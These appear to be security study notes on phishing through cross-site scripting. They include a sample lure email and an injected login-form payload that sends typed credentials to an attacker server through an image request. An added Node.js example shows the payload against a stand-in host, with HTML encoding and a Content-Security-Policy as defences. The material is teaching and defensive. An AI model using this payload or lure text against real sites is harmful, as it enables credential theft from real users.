Phishing
- Phishing uses XSS techniques to steal victims' credentials and subsequently commit crimes using the stolen credentials.
- Attack Vectors:
  - Staged site:
    - Use social engineering (e.g., email, message board, etc.) to trick a victim into clicking a link to a staged site that has an HTML form crafted to resemble the original form.
    - The crafted URL is usually camouflaged by encoding the malicious portion of the injected code or by shortening the entire URL.
    - Here is an example of the email sent to the victim:
      Dear Victim User, Due to an emergency server shut down, we have been experiencing some user account issues. As a result it is necessary that you login to your account within the next 24 hours to validate user membership or else you risk having your membership being terminated. Please proceed by following the link, the hacker's version of the login page, and log into your account. Thank you and we apologize for the inconvenience.
    - After the victim sends the credentials, the attackers fool the victim by returning the following message:
      Dear Victim User, the system is in maintenance, please try it later. Thank you and we apologize for the inconvenience.
    - Search for a victim site and examine its login page.
    - Create the injected code and a fake login page that looks similar, if not identical, to the victim site's. For example:
      </form>
      <form action="login.aspx" method="post" onsubmit="XSSimage = new Image; XSSimage.src = attackerserver + document.forms[1].login.value + ':' + document.forms[1].password.value;">
    - The </form> tag provides a closing tag for the original form, which lets the attacker add and manipulate a form of his own (browsers ignore a <form> nested inside another form, so the original form has to be closed first). The onsubmit property is a set of JavaScript instructions (see https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_%28OWASP-DV-003%29#Gray_Box_testing_and_example) that is executed when the user clicks the submit button, just before the actual form request is sent. So a new image called XSSimage is created when the user clicks the login button to submit the form, and the request for its src is silently sent to the attacker's server carrying the login username and password of the victim.
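The following is an added example (not part of the original notes) that shows, in Node.js, how the </form><form onsubmit=...> injection lands when a login page reflects an untrusted query parameter into its markup, and how two defences neutralise it: HTML-encoding the reflected value before it is written into the page, and a Content-Security-Policy whose img-src directive confines image loads to the site's own origin so the Image beacon is refused by the browser. The page template, the msg parameter, the attacker.invalid host and the simplified CSP evaluator are all assumptions made for the illustration.

```javascript
// Added example, not from the original notes. Names below (renderLoginPage,
// the "msg" query parameter, attacker.invalid) are assumptions for illustration.

// The injection from the notes, with attackerserver filled in as a placeholder host.
// It closes the site's real <form>, then opens an attacker-controlled one whose
// onsubmit handler beacons the typed credentials out through an image request.
const PAYLOAD =
  '</form><form action="login.aspx" method="post" ' +
  'onsubmit="XSSimage = new Image; XSSimage.src = \'https://attacker.invalid/?\' + ' +
  'document.forms[1].login.value + \':\' + document.forms[1].password.value;">';

// Encode the characters that are significant in an HTML text or attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical login page that reflects a status message (say from ?msg=...)
// inside the form. encode=false reproduces the vulnerable behaviour; encode=true
// is the fix: the payload is rendered as inert text.
function renderLoginPage(msg, encode) {
  const shown = encode ? escapeHtml(msg) : msg;
  return (
    '<html><body>' +
    '<form action="login.aspx" method="post">' +
    '<p class="status">' + shown + '</p>' +
    '<input name="login"><input name="password" type="password">' +
    '<input type="submit" value="Login">' +
    '</form></body></html>'
  );
}

// A legitimate login page has exactly one opening <form tag. A second one means
// the reflected value was parsed as markup (browsers ignore a <form> nested in a
// form, which is exactly why the payload starts with </form>).
function countForms(html) {
  return (html.match(/<form\b/gi) || []).length;
}

// Inline onsubmit handlers inside a tag; the server template above emits none,
// so any hit on the rendered page is a sign of injected markup.
function countInlineOnsubmit(html) {
  return (html.match(/<[^>]*\bonsubmit\s*=/gi) || []).length;
}

// Defence in depth: a CSP that confines image loads to the page's own origin.
// Even if an injection slips through, the browser refuses the Image beacon to
// another host. form-action likewise stops the injected form posting elsewhere.
function cspHeader() {
  return "default-src 'self'; img-src 'self'; form-action 'self'; script-src 'self'";
}

// Simplified check (only 'self', '*' and exact origins; no scheme/host wildcards
// and no default-src fallback) of whether img-src permits a load from `origin`.
function cspAllowsImage(header, origin, pageOrigin) {
  const directive = header.split(';').map((d) => d.trim()).find((d) => d.startsWith('img-src '));
  if (!directive) return true; // no img-src: default-src would decide (not modelled here)
  const sources = directive.split(/\s+/).slice(1);
  return sources.some((src) =>
    (src === "'self'" && origin === pageOrigin) || src === '*' || src === origin);
}

// Stand-alone run: compare both renderings and show the CSP decision.
if (typeof require !== 'undefined' && require.main === module) {
  const vulnerable = renderLoginPage(PAYLOAD, false);
  const hardened = renderLoginPage(PAYLOAD, true);
  console.log('vulnerable page: forms =', countForms(vulnerable),
              'inline onsubmit =', countInlineOnsubmit(vulnerable));
  console.log('hardened page:   forms =', countForms(hardened),
              'inline onsubmit =', countInlineOnsubmit(hardened));
  console.log('beacon to attacker.invalid allowed by CSP:',
              cspAllowsImage(cspHeader(), 'https://attacker.invalid', 'https://bank.example'));
}
```

Output encoding is the primary fix: once the reflected value is escaped, the browser sees one form and no inline handler, so nothing runs on submit. The CSP is the backstop for the case the notes describe, where the injected handler does execute: with img-src restricted to 'self', the src assignment on the new Image never reaches the attacker's host.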